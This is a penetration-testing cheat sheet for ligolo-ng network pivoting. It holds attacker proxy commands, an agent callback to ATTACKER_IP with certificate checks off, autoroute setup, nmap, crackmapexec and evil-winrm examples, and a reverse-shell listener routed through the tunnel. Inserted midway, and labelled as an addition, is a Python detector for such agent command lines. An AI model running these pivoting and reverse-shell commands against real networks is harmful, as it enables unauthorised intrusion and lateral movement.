LIGOLO-NG (ADVANCED PIVOTING)

Start proxy (attacker)

Run on attacker — Proxy server

ligolo-proxy -selfcert -laddr 0.0.0.0:443
Example Output
ligolo-proxy -selfcert -laddr 0.0.0.0:443
INFO[0000] Listening on 0.0.0.0:443

Agent connects:
INFO[0005] Agent joined: john@pivot (172.16.1.5)

>> session
>> autoroute
>> start
(Direct access to 172.16.1.0/24, no proxychains needed)

Start agent (pivot)

Run on pivot host — Connects back to proxy

ligolo-agent -connect ATTACKER_IP:443 -ignore-cert
Example Output
./ligolo-agent -connect 10.10.14.2:443 -ignore-cert
[*] Connection established
[*] Waiting for proxy configuration
(Agent running on pivot, connected to your proxy)
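
Defender's view of the agent command line above, as an added example that is not part of the original cheat sheet or of the ligolo-ng project: it flags process-creation records whose arguments carry `-connect host:port`, and rates them higher when `-ignore-cert` (certificate validation disabled) is also present. The sample events, the `helper` and `/opt/agent` paths and all function names are constructed, and the accepted flag spellings assume the agent uses Go's standard flag parsing (`-f`, `--f`, `-f=v`).

```python
import re
import shlex

# Constructed process-creation records (host, user, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("pivot", "john", "./ligolo-agent -connect 10.10.14.2:443 -ignore-cert"),
    ("pivot", "john", "/usr/local/bin/helper --connect=10.10.14.2:443 --ignore-cert"),
    ("web01", "svc", "curl -k https://10.10.14.2:443/health"),
    ("db01", "root", "/opt/agent -connect 192.0.2.7:8443"),
]

HOSTPORT = re.compile(r"^(?:[\w.-]+|\[[0-9A-Fa-f:]+\]):\d{1,5}$")

def parse_flags(cmdline):
    """Map flag name -> value (or True) for -f, --f, -f=v and '-f v' spellings."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes in a logged command line
        argv = cmdline.split()
    flags, i = {}, 1            # argv[0] is the binary; its name is ignored
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            name, sep, value = tok.lstrip("-").partition("=")
            if not sep and i + 1 < len(argv) and not argv[i + 1].startswith("-"):
                i += 1
                value = argv[i]
            flags[name] = value or True
        i += 1
    return flags

def classify(cmdline):
    """Return None, or a finding dict with the callback target and a severity."""
    flags = parse_flags(cmdline)
    target = flags.get("connect")
    if not isinstance(target, str) or not HOSTPORT.match(target):
        return None
    # Disabled certificate validation on an outbound tunnel is the stronger signal.
    severity = "high" if "ignore-cert" in flags else "medium"
    return {"target": target, "severity": severity}

def detect(events):
    """Run classify() over (host, user, cmdline) records and collect findings."""
    return [{"host": h, "user": u, **f}
            for h, u, c in events if (f := classify(c))]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Medium findings need triage, since other tools also take a `-connect` argument; correlate them with outbound connections from the same process before escalating.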

Add route and start tunnel

In ligolo proxy interface — Adds route to internal network

session (select session)
autoroute
start
Example Output
ligolo>> session
  1 - john@pivot - 172.16.1.5
ligolo>> autoroute
[+] Route 172.16.1.0/24 added
ligolo>> start
[+] Tunnel started
(Direct access to internal network, no proxychains needed)

Access internal network directly

No proxychains needed — Transparent tunnel

nmap INTERNAL_IP
crackmapexec smb INTERNAL_IP
Example Output
nmap -sT -Pn 172.16.1.10
crackmapexec smb 172.16.1.10
evil-winrm -i 172.16.1.10

(All tools work directly, no proxychains prefix needed)
(This is the main advantage of ligolo over chisel)

Add listeners for reverse shells

Forward reverse shells through tunnel — Internal targets connect to pivot, you get shell

listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
Example Output
ligolo>> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp

On internal target: reverse shell to 172.16.1.5:4444
Shell arrives at your machine on port 4444
(Reverse shells route through the tunnel)